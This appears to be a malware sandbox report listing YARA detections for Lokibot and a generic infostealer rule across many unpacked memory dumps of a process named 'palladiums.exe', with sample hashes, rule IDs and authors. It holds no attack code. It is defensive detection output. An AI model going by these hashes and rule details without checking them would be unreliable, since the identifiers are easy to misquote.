Source: 19.2.palladiums.exe.3990000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 19.2.palladiums.exe.3990000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 19.2.palladiums.exe.3990000.1.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 19.2.palladiums.exe.3990000.1.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 21.2.palladiums.exe.3b50000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 21.2.palladiums.exe.3b50000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 21.2.palladiums.exe.3b50000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 21.2.palladiums.exe.3b50000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 21.2.palladiums.exe.3b50000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 16.2.palladiums.exe.1570000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 16.2.palladiums.exe.1570000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 16.2.palladiums.exe.1570000.1.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 16.2.palladiums.exe.1570000.1.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 18.2.palladiums.exe.f20000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 18.2.palladiums.exe.f20000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 18.2.palladiums.exe.f20000.1.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 18.2.palladiums.exe.f20000.1.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 15.2.palladiums.exe.14d0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 15.2.palladiums.exe.14d0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 15.2.palladiums.exe.14d0000.1.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 15.2.palladiums.exe.14d0000.1.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 19.2.palladiums.exe.3990000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 19.2.palladiums.exe.3990000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 19.2.palladiums.exe.3990000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 19.2.palladiums.exe.3990000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 19.2.palladiums.exe.3990000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 22.2.palladiums.exe.3830000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 22.2.palladiums.exe.3830000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 22.2.palladiums.exe.3830000.1.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 22.2.palladiums.exe.3830000.1.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 36.2.palladiums.exe.2010000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 36.2.palladiums.exe.2010000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 36.2.palladiums.exe.2010000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 36.2.palladiums.exe.2010000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 36.2.palladiums.exe.2010000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 37.2.palladiums.exe.2ee0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 37.2.palladiums.exe.2ee0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 37.2.palladiums.exe.2ee0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 37.2.palladiums.exe.2ee0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 37.2.palladiums.exe.2ee0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 11.2.palladiums.exe.3680000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 11.2.palladiums.exe.3680000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 11.2.palladiums.exe.3680000.1.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 11.2.palladiums.exe.3680000.1.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 14.2.palladiums.exe.ad0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 14.2.palladiums.exe.ad0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 14.2.palladiums.exe.ad0000.1.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 14.2.palladiums.exe.ad0000.1.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 27.2.palladiums.exe.3a70000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 27.2.palladiums.exe.3a70000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 27.2.palladiums.exe.3a70000.1.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 27.2.palladiums.exe.3a70000.1.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 23.2.palladiums.exe.1440000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 23.2.palladiums.exe.1440000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 23.2.palladiums.exe.1440000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 23.2.palladiums.exe.1440000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 23.2.palladiums.exe.1440000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 27.2.palladiums.exe.3a70000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 27.2.palladiums.exe.3a70000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 27.2.palladiums.exe.3a70000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 27.2.palladiums.exe.3a70000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 27.2.palladiums.exe.3a70000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 12.2.palladiums.exe.1b30000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 12.2.palladiums.exe.1b30000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 12.2.palladiums.exe.1b30000.1.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 12.2.palladiums.exe.1b30000.1.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 32.2.palladiums.exe.3b60000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 32.2.palladiums.exe.3b60000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 32.2.palladiums.exe.3b60000.1.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 32.2.palladiums.exe.3b60000.1.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 32.2.palladiums.exe.3b60000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 32.2.palladiums.exe.3b60000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 32.2.palladiums.exe.3b60000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 32.2.palladiums.exe.3b60000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 32.2.palladiums.exe.3b60000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 31.2.palladiums.exe.1a60000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 31.2.palladiums.exe.1a60000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 31.2.palladiums.exe.1a60000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 31.2.palladiums.exe.1a60000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 31.2.palladiums.exe.1a60000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 30.2.palladiums.exe.38b0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
